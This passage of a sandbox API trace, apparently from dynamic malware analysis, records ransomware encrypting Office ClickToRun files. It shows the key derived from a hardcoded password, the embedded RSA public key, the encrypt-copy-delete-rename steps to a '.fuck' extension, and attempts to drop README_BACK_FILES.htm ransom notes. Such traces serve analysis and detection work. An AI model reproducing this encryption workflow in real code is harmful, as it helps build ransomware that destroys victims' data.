"c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0238.833] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0238.834] CryptDestroyHash (hHash=0x282e0f8) returned 1 [0238.834] CryptDestroyKey (hKey=0x282e3f8) returned 1 [0238.834] CryptReleaseContext (hProv=0x28819e0, dwFlags=0x0) returned 1 [0238.834] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.834] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.834] GetLastError () returned 0x5 [0238.834] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash")) returned 0x20 [0238.834] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0238.835] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.835] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.836] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.836] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x287fb98) returned 1 [0238.841] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.841] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.842] CryptHashData (hHash=0x282e3f8, pbData=0x2884af8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.842] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282e0f8) returned 1 [0238.842] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.842] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.842] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2880eb8) returned 1 [0238.842] CryptImportPublicKeyInfo (in: hCryptProv=0x2880eb8, dwCertEncodingType=0x1, pInfo=0x286c518*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c548*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c550*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ea8d0) returned 1 [0238.843] CryptEncrypt (in: hKey=0x27ea8d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.843] CryptEncrypt (in: hKey=0x27ea8d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28819e0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28819e0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.843] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28819e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.843] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.843] CryptEncrypt (in: hKey=0x282e0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.843] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.843] CloseHandle (hObject=0xffffffff) returned 1 [0238.843] CloseHandle (hObject=0xffffffff) returned 1 [0238.843] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0238.844] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0238.844] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg")) returned 0 [0238.845] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.fuck")) returned 0 [0238.845] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.845] CryptDestroyKey (hKey=0x282e0f8) returned 1 [0238.845] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.845] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.845] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0238.845] GetLastError () returned 0x5 [0238.845] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0238.846] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0238.847] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.847] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.848] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0238.848] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2882260) returned 1 [0238.851] CryptCreateHash (in: hProv=0x2882260, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0238.851] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.851] CryptHashData (hHash=0x282e3f8, pbData=0x2885188, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.851] CryptDeriveKey (in: hProv=0x2882260, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x282dfb8) returned 1 [0238.851] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.851] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0238.851] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28821d8) returned 1 [0238.852] CryptImportPublicKeyInfo (in: hCryptProv=0x28821d8, dwCertEncodingType=0x1, pInfo=0x286c5e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c618*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c620*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817298) returned 1 [0238.852] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0238.852] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882040*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2882040*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0238.852] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882040, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.852] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0238.852] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0238.852] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0238.852] CloseHandle (hObject=0xffffffff) returned 1 [0238.852] CloseHandle (hObject=0xffffffff) returned 1 [0238.852] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0238.853] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0238.853] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0238.854] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0238.854] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.854] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.854] CryptReleaseContext (hProv=0x2882260, dwFlags=0x0) returned 1 [0238.857] FindNextFileA (in: hFindFile=0x28467e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0238.857] FindClose (in: hFindFile=0x28467e0 | out: hFindFile=0x28467e0) returned 1 [0238.857] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0238.858] AreFileApisANSI () returned 1 [0238.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 110 [0238.858] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.858] GetLastError () returned 0x5 [0238.858] GetLastError () returned 0x5 [0238.858] FindNextFileA (in: hFindFile=0x282deb8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.859] FindClose (in: hFindFile=0x282deb8 | out: hFindFile=0x282deb8) returned 1 [0238.859] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\readme_back_files.htm")) returned 0xffffffff [0238.859] AreFileApisANSI () returned 1 [0238.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0238.859] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.859] GetLastError () returned 0x5 [0238.859] GetLastError () returned 0x5 [0238.860] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.860] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0238.860] GetLastError () returned 0x5 [0238.860] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml")) returned 0x20 [0238.860] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", dwFileAttributes=0x80) returned 0 [0238.860] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.861] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.861] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.862] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x287fb98) returned 1 [0238.864] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0238.864] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.864] CryptHashData (hHash=0x282deb8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.864] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282deb8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x282dfb8) returned 1 [0238.864] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.864] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0238.865] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2882a58) returned 1 [0238.865] CryptImportPublicKeyInfo (in: hCryptProv=0x2882a58, dwCertEncodingType=0x1, pInfo=0x286c448*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286c478*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286c480*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x282e0f8) returned 1 [0238.865] CryptEncrypt (in: hKey=0x282e0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0238.865] CryptEncrypt (in: hKey=0x282e0f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28828c0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28828c0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0238.865] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28828c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.865] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0238.866] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0238.866] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0238.866] CloseHandle (hObject=0xffffffff) returned 1 [0238.866] CloseHandle (hObject=0xffffffff) returned 1 [0238.866] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml"), bFailIfExists=0) returned 0 [0238.866] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", dwFileAttributes=0x0) returned 0 [0238.867] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg")) returned 0 [0238.867] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.fuck")) returned 0 [0238.868] CryptDestroyHash (hHash=0x282deb8) returned 1 [0238.868] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.868] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.868] FindNextFileA (in: hFindFile=0x282de78, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.868] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0238.868] GetLastError () returned 0x5 [0238.868] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml")) returned 0x20 [0238.868] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", dwFileAttributes=0x80) returned 0 [0238.869] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 